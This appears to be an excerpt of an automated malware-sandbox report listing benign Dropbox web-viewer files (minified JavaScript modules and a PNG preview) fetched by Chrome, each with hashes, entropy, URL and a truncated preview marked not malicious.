                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:3D06EFE4649446FC63BECA8D233D63BC
                                                    SHA1:F4130ADEDF1D4D2B5E0B637D0CE0235B3AF94B2D
                                                    SHA-256:9D9D228476FC5A8E2813EAA2EA7F66333A70EFFA034FC2C1C5D44005A84B53B3
                                                    SHA-512:B0A025E67A36F0D9E06D201174583D227A4031736FD543BBE7742A7E34892FF85F39E9C3E467790AEA6BB30C388BB6F20B6E413611D766A387E9F3666435919F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_contacts_contact-vflPQbv5G.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_api_v2_routes_folders_info_provider","./c_validators"],(function(t,e,i,a){"use strict";class s{static sorter(t,e){return e.domain_contact&&!t.domain_contact?-1:t.domain_contact&&!e.domain_contact?1:t.sort_key||e.sort_key?t.sort_key?e.sort_key?t.sort_key>e.sort_key?-1:t.sort_key<e.sort_key?1:0:-1:1:0}static is_valid(t){return t.dbx_account_id?t.type===e.ContactTypes.DBX_ID||t.type===e.ContactTypes.EMAIL:t.group_id?t.type===e.ContactTypes.NEW_STYLE_GROUP:!!t.email&&t.type===e.ContactTypes.EMAIL}static get_key(t){return i.assert(s.is_valid(t),`invalid contact: type: ${t.type}`),t.dbx_account_id?`DBX_USER-${t.dbx_account_id}`:t.group_id?`DBX_GROUP-${t.group_id}`:`CONTACT-${t.type}-${t.email}`}static get_index_tokens(t){let e=[];return t.name&&e.push(t.name),t.email&&e.push(t.email),t.fname&&e.push(t.fname),t.lname&&e.push(t.lname),t.name_tokens&&(e=e.concat(t.name_tokens)),e}}class n{constructor({dbx_account_id:t,type:e,name:i
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 1583 x 2048, 8-bit colormap, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):121515
                                                    Entropy (8bit):7.933292823906673
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:EB7062876103A28C8BDB50D89934F7E0
                                                    SHA1:30237083DD3BFBBE4D43F0E55903EC7B1C8B03C8
                                                    SHA-256:2E5D815BA77257B166B42DC1B0BCA4DE04A2B8449987FC1100705900201C6CA7
                                                    SHA-512:74685A9E77AAF2C32C4B50B3563593ED3E977B0C5F1CD49BA046F6F21606BA82C31DCFE3157369BC066FFFF0DC277E2A23DB74822C03FAE500B666F82C6A947E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://uce3be385a7bf3e7836869b0a870.previews.dropboxusercontent.com/p/pdf_img/ACYRnvXD6al-31vnoLxWwjPlj4ih-KrLX-MzI3C4eFJdmOPcRG6-ps9sHc9dOxVNZpQHTsGTHcGBHdxv_pCxLhNu6mzDLhv6RSwxvAMBF-aY5071DfMZBn1zMa9w5-Oql_Dt-F-yVGUXBzEopvEcjsklK-XizK2vacEH4yt3h8rKQoF6kxxpZa43SOAFVGN9KS4ERobTxJVJegzr4S_e2ht8c7kHb2J8ABKHE5azRwalUOeAiwhUnS3LqhkjHpd14FxR0lkqC-Oy2Zz-HRFyfMmNF1GDaBkqnNA9KB_9Ha7iLb3TVK3vv-2yDkbBII8ie4nlldMw5x-LG4CKHt-8D7L5/p.png?page=0
                                                    Preview:.PNG........IHDR.../.........iYPY....gAMA......a.....sRGB.........PLTE...............vpp........XXX.................................xrr....(...................................~yy......{uv.....................;;@...............................335.............!...oor...aad........AAE.....OOQ.......F...E...H......{hhl....b.[[^........1......GGI............................Y0.......J....!!!SSY..........G.....5...............2....D...B.......;fW...=..||.......ED..Pvvy..BJ......H..~~....8....o.....%D......<...cB"N...........ji..U.^5......Zu...?..b.U)$F.Go..n.`.......d....Cy.G..........................'''...||.....?.J....(T.....++8V...........;Kh..{.6y.ZZ........ds.....P\......55FGOEe............X.....E....RIH............w......zz..2,,,...b......p6g.5..6a...........[.`***.Z~~~A......I[m.+R..W..j..\P.6... .IDATx...mL...6...0A.F*..P.....Q.*/Q|.b.m..".p.=.B4:$....C.......|x...%....v..'.B1$.&$..k.>.&..&...o?..s]..3.J[...c...u.k..:.r..<..b...."@.... .D...."@.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1838)
                                                    Category:downloaded
                                                    Size (bytes):1917
                                                    Entropy (8bit):5.230671597653106
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:545CFA72A38FC6F444E990A260969FE4
                                                    SHA1:F8D1DDD6709C4E11BCDA2FE33420EC4D6780D1D6
                                                    SHA-256:2ED5ED4B187A3846C4B5B7E59DF7C587E421329804D3ADFB4555294B2801BD40
                                                    SHA-512:F688073AEABE8D29A195009E0E2A3707726E94F07C74B8327613F471A159DD3AD32D9C19BA21DB9991DB948457D4895AA03416D67985422E1D04AC58E2BBC86A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_shuffle-vflVFz6cq.js
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var l=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,l.get?l:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var l=r(t);e.DropboxDocSendLine=e=>l.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},l.createElement("path",{d:"M11.746 5h6.691v7l-6.691-7v7h6.7v.485c0 4.424-2.688 6.515-6.7 6.515-4.192 0-6.692-2.053-6.692-6.517v-.875C5.054 7.318 7.756 5 11.746 5Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.FailFill=e=>l.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},l.createElement("path",{d:"M12 4c-5.159 0-8 2.841-8 8s2.841 8 8 8 8-2.841 8-8-2.841-8-8-8Zm3.536 10.475-1.061 1.06L12 13.06l-2.475 2.476-1.06-1.061L10.94 12 8.463 9.525l1.061-1.06L12 10.94l2.475-2.476 1.06 1.061L13.06 12l2.476 2.475Z",fill:"currentColor",vectorEffec
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (501)
                                                    Category:downloaded
                                                    Size (bytes):557
                                                    Entropy (8bit):5.019312751867273
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2EB0120D2F740CFF5F759BFA12B707B1
                                                    SHA1:F49659A24DEA594BBE3F6C544BA2C6A5151173D8
                                                    SHA-256:D9E77D57881E465F2A64C452D2DD897AC3EFA7C0487AD98921E0990664398E91
                                                    SHA-512:4856B52EE147A863740273A7A2DDE510FAFF138A7B88FDEC8C8EECDB61A8536E83AD8EDC9C739D4F82BC3E4023343533D041AE199B8A6C2BEF2E22EABCDF7A7C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_viewer_helpers-vflLrASDS.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder"],(function(e,t){"use strict";function r(e,r,n){return function(e,r,n){return n===t.ROLE_WORK?r.team_name:r.is_paired?function(e){return e.formatMessage({id:"QPBzI3",defaultMessage:"Personal"})}(e):""}(e,r,n.role)}e.deprecatedGetRoleTitle=function(e,t,n){return r(e,t,n)},e.deprecatedGetRootName=function(e,t,n){return function(e,t,n){return r(e,t,n)||function(e){return e.formatMessage({id:"rIir19",defaultMessage:"Dropbox"})}(e)}(e,t,n)}}));.//# sourceMappingURL=c_viewer_helpers.js-vfljOZe7_.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (578)
                                                    Category:dropped
                                                    Size (bytes):640
                                                    Entropy (8bit):5.558489153428109
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:7AB5BD1E842BD1B69A76C9394EF4560F
                                                    SHA1:A0B2B53F3B811651476E7DDDFB4653A71BC105CC
                                                    SHA-256:0FDFA6AF707DB01EBDABF19A93A367B14E858F65C465096E095BB74AB02136D3
                                                    SHA-512:0CF4CDA0B281169AC0FAC1CB27846F0C99C3C0EA3982037CCD082A24C3079956D1967218FD5C3B7C3F3ACF62D6AA49A1ABA5328BB5770754936D02B87EA71A68
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports"],(function(i){"use strict";var E,n;i.ExpirationOption=void 0,(E=i.ExpirationOption||(i.ExpirationOption={}))[E.SEVEN_DAYS=7]="SEVEN_DAYS",E[E.THIRTY_DAYS=30]="THIRTY_DAYS",E[E.NINETY_DAYS=90]="NINETY_DAYS",E[E.CUSTOM=0]="CUSTOM",function(i){i.EXPIRED="expired",i.SHARED="shared"}(n||(n={}));var t;i.ExpirationOption.SEVEN_DAYS,i.ExpirationOption.SEVEN_DAYS,i.ExpirationOption.THIRTY_DAYS,function(i){i.WAITING="waiting",i.FAILED="failed",i.UPLOADING="uploading",i.COMPLETED="completed"}(t||(t={})),i.BYTES_IN_GIGABYTE=1073741824,i.BYTES_IN_MEGABYTE=1048576}));.//# sourceMappingURL=c_src_common_constants.js-vfla8masK.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1973)
                                                    Category:downloaded
                                                    Size (bytes):2049
                                                    Entropy (8bit):5.261465315986142
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9EC57CFE53E3473FD0580D7FBFF57977
                                                    SHA1:34DA5FE5996F2AB7023F6D3C920133D4DF0EC4B8
                                                    SHA-256:21B79C15EFD627E0023550249E5F2A40E1D29463FFD4429DB5E010896C8A0DA7
                                                    SHA-512:50124A88B2501E4CB721F252104744DED02EC040120A0F754EEB908A1D24553934FFDF0BF2F85889BD9DD1EB93ED1B86B2C1A2F3DAF0F97BC513A063C25C2989
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_lock-vflnsV8_l.js
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=r(t);e.GoogleExternalLogo=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M12.162 3.975A8.027 8.027 0 0 0 4.134 12a8.027 8.027 0 0 0 8.028 8.025c6.694 0 8.202-6.215 7.574-9.362h-7.577v2.675h5.175A5.348 5.348 0 0 1 6.809 12a5.35 5.35 0 0 1 5.35-5.35c1.343 0 2.567.499 3.507 1.317l1.9-1.9a7.998 7.998 0 0 0-5.404-2.092Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.ImportContactsLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M6.5 15.75A2.753 2.753 0 0 1 9.25 13h5.5a2.746 2.746 0 0 1 2.12 1h1.75a4.25 4.25 0 0 0-3.72-2.489A4.817 4.817 0 0 0 15.5
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3587)
                                                    Category:downloaded
                                                    Size (bytes):3663
                                                    Entropy (8bit):5.451709164135938
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BA56FD0DDB76B226795013B1E6405828
                                                    SHA1:093E8AC5B72399C05DC4722E86A25D13953F4A61
                                                    SHA-256:AA076E24BAC976493AEE1B98649404C77FA87AD377803F4EB818393A0FE6327B
                                                    SHA-512:C658B02364030C271BD9E7E6CC5E6464A0D8DA868526F0E7D4CB9701597F6785C822C7A0906F44F0FF3538F9A6AFB62E44AEFA89E8ED34AB465B1A9A712E1C84
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_common_show_auth_modal-vflulb9Dd.js
                                                    Preview:define(["require","exports","react","./e_file_viewer_static_scl_page_folder","./c_admin_registration_source_constants"],(function(e,i,n,t,r){"use strict";function o(e){return e&&e.__esModule?e:{default:e}}var a=o(n);const s=(i,n)=>async r=>{const{Store:o,ungatedDBStore:a}=await new Promise((function(i,n){e(["./c_ungated_idx_db_access_lib"],i,n)})),s=await a.getLatestUngatedSessionKeyForStore(i===t.PreviewType.SsrDoc?o.PDF_EDIT_STORE:o.IMG_EDIT_STORE);if(s){const e=await a.getFileMetadata(s);r===t.Mode.REGISTER&&await a.saveFileMetadata(s,{...e,user_registered:"true"})}n?t.redirect(n):t.reload()},g={[t.AuthMode.LOGIN]:t.Mode.LOGIN,[t.AuthMode.REGISTER]:t.Mode.REGISTER},_={[t.LoginOrRegisterKind$1.COMMENT]:t.LoginOrRegisterKind.COMMENT,[t.LoginOrRegisterKind$1.DOWNLOAD]:t.LoginOrRegisterKind.DOWNLOAD,[t.LoginOrRegisterKind$1.IMMEDIATE]:t.LoginOrRegisterKind.IMMEDIATE,[t.LoginOrRegisterKind$1.POSTDOWNLOAD]:t.LoginOrRegisterKind.POSTDOWNLOAD,[t.LoginOrRegisterKind$1.POSTSAVEAS]:t.LoginOrRe
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (23723)
                                                    Category:dropped
                                                    Size (bytes):23852
                                                    Entropy (8bit):5.3280703846464625
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8CE8FEE1302FEF080797DF90D2815616
                                                    SHA1:B9CC6CAEC6EBF70C7230866C585BDBCDB437A61A
                                                    SHA-256:A47D6C78950308ADCA9D969E2FEAC46E01ABDFCD0F9602923A7CEE2EB2EBC3A7
                                                    SHA-512:347C0C7A5EB49A4D606F307C69FF2463A235461626B048B5C02BF02EC78AA98A6B15BF8F8B0E27BB2CFEA06F8233E520296648C97DD85CC67AFA589D765764D6
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_core_i18n"],(function(e,a,t,s){"use strict";function o(e){return e&&e.__esModule?e:{default:e}}var i,d=o(a);e.ProductUpdateReleaseKey=void 0,(i=e.ProductUpdateReleaseKey||(e.ProductUpdateReleaseKey={})).RELEASE_2023_01_30="RELEASE_2023_01_30",i.RELEASE_2023_02_28="RELEASE_2023_02_28",i.RELEASE_2023_04_25="RELEASE_2023_04_25",i.RELEASE_2023_07_14="RELEASE_2023_07_14",i.RELEASE_2023_08_29="RELEASE_2023_08_29",i.RELEASE_2023_10_10="RELEASE_2023_10_10",i.RELEASE_2023_12_19="RELEASE_2023_12_19",i.RELEASE_2024_02_27="RELEASE_2024_02_27",i.RELEASE_2024_04_24="RELEASE_2024_04_24",i.RELEASE_2024_07_30="RELEASE_2024_07_30";const r={newFeature:s.intl.formatMessage({id:"4pLc5N",defaultMessage:"New feature"}),improvement:s.intl.formatMessage({id:"ckjSKd",defaultMessage:"Improvement"}),announcement:s.intl.formatMessage({id:"CZ4zJZ",defaultMessage:"Announcement"})},n=e=>s.intl.formatDate(e,{year:"numeric",month:"short",day:"numer
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (1593)
                                                    Category:downloaded
                                                    Size (bytes):1666
                                                    Entropy (8bit):5.398721324992305
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B6C52C8D7165220E49B20CE648042AE0
                                                    SHA1:E205A338397B9D03A5BD0DF34607390A6205EB60
                                                    SHA-256:41E4622E9EC9C3E10A3D03B408C77E54E574AF3CAACC393EB0D6E4F9A7ABA7E5
                                                    SHA-512:8DBFA8D38D65F17B603B9150EDD3FF9BAFC14010B2539123CE388B1E352F42A0A293C44868D0049B97FFB3765DA76EE155717FD2C01766B596AB60B5C97313F9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_portable_delete_strings-vfltsUsjX.js
                                                    Preview:define(["exports","react","./c_core_i18n"],(function(e,o,l){"use strict";const r=l.defineMessage({id:"uI4EPd",defaultMessage:"Are you sure you want to delete this from your Dropbox <u>and</u> your computer?"}),a=l.defineMessage({id:"GDyzdI",defaultMessage:"If not, go to your file or folder in Finder, make sure it.s locally available, and right click it and click <b>Don.t sync to dropbox.com</b>."}),t=l.defineMessage({id:"3y4uyY",defaultMessage:"If not, go to your file or folder in File Explorer, make sure it.s locally available, and right click it and click <b>Don.t sync to dropbox.com</b>."}),d=l.defineMessage({id:"yCm9Ew",defaultMessage:"Delete {folderName} from your backup and computer?"}),i=l.defineMessage({id:"Tay+m0",defaultMessage:"{folderName} will be deleted from Dropbox Backup and the files and folders will no longer live on your computer.<br></br>If you change your mind, you can click <b>Show deleted files</b> to restore it to your backup."}),s=l.defineMessage({id:"x
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (4978)
                                                    Category:dropped
                                                    Size (bytes):5055
                                                    Entropy (8bit):5.188251962308825
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:093ED579907FB61A60E89FC2C1E08D08
                                                    SHA1:E26DD3E3A4211A4C028CA7ED09E57DE8CA7778A6
                                                    SHA-256:243A8902DAEEB5C22EB0FDF2DAE05DE8737D13940FD4E8266EF231160CFBB184
                                                    SHA-512:076E514A2BE4534C143B28268B5F7A895713D0510A3E8A97AAC181B29F62FBB8E43F64B49F30A1D681367A8889211803C4BCA06B645F67560C9929B956CB8BB0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports"],(function(_){"use strict";var E;_.RegistrationSource=void 0,(E=_.RegistrationSource||(_.RegistrationSource={})).MOBILE_HARDSTOP="mobile_hardstop",E.WEB_REGISTER="web",E.CHOOSER_REGISTER="chooser_generic",E.CLIENT_REGISTER="client",E.SHARE_REGISTER="share",E.FB_SHARE_REGISTER="fb_share",E.REFERRAL_REGISTER="referral",E.API_REGISTER="api",E.IPHONE_REGISTER="iphone",E.TEAM_REGISTER="team",E.TEAM_SSO_REGISTER="team_sso",E.TEAM_CREATION_REGISTER="team_creation",E.TEAM_BILLING_CONTACT_REGISTER="team_billing_contact",E.API_OAUTH_REGISTER="oauth",E.IPAD_REGISTER="ipad",E.ANDROID_REGISTER="android",E.ANDROID_PDFVIEWER_REGISTER="android_pdfviewer",E.BLACKBERRY_REGISTER="blackberry",E.WINDOWS_PHONE_TAB_REGISTER="windows_phone_tablet",E.SHMODEL_MODAL_REGISTER="shmodel_modal_register",E.SHMODEL_DOWNLOAD_REGISTER="shmodel_download_register",E.SHMODEL_SAVE_TO_REGISTER="shmodel_save_to_register",E.SHMODEL_SAVE_AS_REGISTER="shmodel_save_as_register",E.COMMENTS_SHMODEL_MODAL_REGISTER=
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (40964)
                                                    Category:dropped
                                                    Size (bytes):41032
                                                    Entropy (8bit):5.18918893892822
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B9E1A327462001EF803B3597CD1471F7
                                                    SHA1:2E28249DBD6DF5AE66F7518C77D835879753B1D6
                                                    SHA-256:601543B72DCD99A79CDF578A1553AC777B6F0A2EF5E64386028CED6BEFB4BF89
                                                    SHA-512:BC5C6BCBCF8C36C744F147704447877E3B513878DE47E3BED47FD95A74C94539662152248991088525116E8AEF47830AFFCA33806D50D3D83EC2E2DD75FFAA0F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","./c_file_viewer_pap_logger_utils","./e_core_exception","./c_pap-events_previews_create_folder","./c_extensions_open_button_types","./c_core_logging_video"],(function(e,t,i,o,n,r,a,c,s,l){"use strict";function p(e){return{class:"previews",action:"save",object:"edit_mode",properties:e}}var d;function _(e){return{class:"dropbox_ai",action:"select",object:"dropbox_ai_ask",properties:e}}function v(e){return{class:"dropbox_ai",action:"select",object:"dropbox_ai_summarize",properties:e}}e.WorkflowsEvent=void 0,(d=e.WorkflowsEvent||(e.WorkflowsEvent={})).WatermarkApplySaveAsCopy="watermark_apply_save_as_copy",d.WatermarkStart="watermark_start",d.WatermarkSuccess="watermark_success",d.WatermarkFailed="watermark_failed",d.WatermarkCancel="watermark_cancel",d.WatermarkAddImage="watermark_add_image",d.WatermarkRotate="watermark_rotate",d.WatermarkUp
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (590)
                                                    Category:downloaded
                                                    Size (bytes):659
                                                    Entropy (8bit):5.464098430989028
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:3AFA671382E62C3F7731F3F6383F8D43
                                                    SHA1:E3FB0CBC47F93F64B1C0F1C76E3C15A1F96ADCC1
                                                    SHA-256:4EF9B8E5D045C20941B52EA75ECCBEF0B21CAB964EB213C0B4FCD2142DCF2088
                                                    SHA-512:D73577E20F1411D8AC961000D1D29A9EE72DDAAA01BEFC8C088562B053EDDE11DD404A755CB47D7B35DB36F409BA3A4E40BFF1F14CFC0A1B076C4F082F05F142
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_sync_everything_redux_types-vflOvpnE4.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder"],(function(S,_){"use strict";const U={backups:null,isBackupSearch:!1,isInsideBackup:!1,currentBackup:null,lastBackupTimes:_.immutableExports.Map(),stormcrows:null,userSKU:null,userQuota:null};var T;S.Actions=void 0,(T=S.Actions||(S.Actions={})).SET_BACKUPS="BACKUP/SET_BACKUPS",T.SET_CURRENT_BACKUP="BACKUPS/SET_CURRENT_BACKUP",T.SET_LAST_BACKUP_TIMES="BACKUP/UPDATE_LAST_BACKUP_TIMES",T.SET_STORMCROWS="BACKUP/SET_STORMCROWS",T.SET_USER_SKU="BACKUP/SET_USER_SKU",T.SET_USER_QUOTA="BACKUP/SET_USER_QUOTA",S.defaultBackupState=U}));.//# sourceMappingURL=c_sync_everything_redux_types.js-vflKFtHli.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2601)
                                                    Category:downloaded
                                                    Size (bytes):2678
                                                    Entropy (8bit):5.197356766243019
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:214EB5E21DE92DE0440FF0D687927D52
                                                    SHA1:B13ACD71A53E1C8913FADDAEF02BC244B488D1FB
                                                    SHA-256:78BB71FC9CC8022C3E4E5AF3B06DC8917BA3F8A93CB91EEFB8A36F833A815251
                                                    SHA-512:5DADD67CF42E97A6BFC5ABED39655BBEEF1F2DE066ADAA878705276555CEF57191D39F7D49FDBB4A0C9BE21C14F9C3550E9E15EB031ECCBFF44ADCE1676061D1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_share-vflIU614h.js
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function c(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(c){if("default"!==c){var n=Object.getOwnPropertyDescriptor(e,c);Object.defineProperty(t,c,n.get?n:{enumerable:!0,get:function(){return e[c]}})}})),t.default=e,Object.freeze(t)}var n=c(t);e.AnalyticsLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M17.5 6H6v11.5h11.5V6Zm-13-1.5V19H19V4.5H4.5Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"}),n.createElement("path",{d:"M8 11.5h1.5V15H8v-3.5Zm3-1.5h1.5v5H11v-5Zm3-1.5h1.5V15H14V8.5Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.QuotaReachedLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M8.241 15.613a1.355 1.355 0 0 0-.012.16c0 .443.075.847.186 1.227H4.069l-.043-.705A13.652 13.652 0 0 1 4 15.5c0-5.159 2.841-8 8-8 1.539 0 2.86
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1109)
                                                    Category:downloaded
                                                    Size (bytes):1181
                                                    Entropy (8bit):4.995698060982376
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E41CC22251DD82AE9BE3EE0E80614FA1
                                                    SHA1:470794DC4D7392034584B969C95BB8AE63A67C6B
                                                    SHA-256:ED4BF3445C996E17F12D03B8F0D54C71AE9C069D1C389E587032642AD7DF9C39
                                                    SHA-512:E2086FB5C470617125A21345F9F3007EB7EE5FF67A5299689F1EBA3F69B66ED9AB12EC9B233D25FA481AB8585C1F2901E3A5D3A73D9090D22532CFEB860A0AFA
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_components_title-bar_title_bar-vfl5BzCIl.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_core_i18n","./e_core_exception","./c_lodash","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(e,r,n,s,t,i,o,a,_,c,l,d,u,p,f,m,g,h){"use strict";function v(e){return e&&e.__esModule?e:{default:e}}var S=v(r);e.SharedLinkFolderTitleBar=e=>{const{folder:r,sharedLinkInfo:s,sharePermission:t,shareToken:i,sizeClass:o,user:a,encryptionOptions:_,implicitTOSVariant:c,webSignInTag:l,reloadPage:d,onSignUpSuccess:u}=e;return S.default.createElement(n.TitleBarBase,{controls:S.default.createElement(n.SharedLinkFolderControls,{folder:r,sharePermission:t,sharedLinkInfo:s,shareToken:i,sizeC
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (4512)
                                                    Category:dropped
                                                    Size (bytes):4579
                                                    Entropy (8bit):5.124788144464746
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:DC81F275E817458520E61CD59D27B684
                                                    SHA1:2D403B9F56D8672CE274A2AF0EC7352D2F7FB546
                                                    SHA-256:CF98BE8E5893B22D39B78C8D9E282AE83929D21EA766304947912BE2D7B6EEDE
                                                    SHA-512:38EB021338554FD37F660F2280B67CCD5BED049B7CCFCA4D0BB0DE2FDC8B90BD0D4599EB2B7724EBB6388EAE089DAB7FC27DA07E032A9B9E1695BE381A03385D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_flows_constants","./c_flows_conversions_convert","./c_flows_conversions_utils","./c_core_i18n","./c_api_v2_routes_folders_info_provider","react","./c_dig-icons_assets_ui-icon_line_zip","./e_edison","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","./e_core_exception","./c_lodash","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_src_sink_index","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","./c_ui_image","./c_browse_action_logger","./c_tagging_utils","./c_browse_models","./c_search_search_helpers","./c_plugin_utils_getImageDefaultSizes","./c_tagging_data_store","./c_sync_everything_redux_store","./c_sync_everything_redux_types","./c_flows_redux_reducer","./c_flows_redux_store","metaserver/static/js/langpack","./c_flows_redux_actions","./c_flows_redux_selectors","./c_flows_utils_browse_l
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1112)
                                                    Category:downloaded
                                                    Size (bytes):1173
                                                    Entropy (8bit):5.085626585907054
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6129DA74EF7420F78CEAA2C9DA706511
                                                    SHA1:4F7DE400EFE64BEC014A91BA292BFA8341A89533
                                                    SHA-256:02B79FB0DB850B459EFB377AA565DEEB9F97D47043E4FFA11B20A4169677A5A0
                                                    SHA-512:3D75AAF0C3472250E34E48F8139C947B0BBE56CA3B0968D23DCF65709CB6B75487B39D50AD96847B10E1FA5876C82DFF57C389BB80C8BA73E534A7B8673C6733
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_react-use_misc_util-vflYSnadO.js
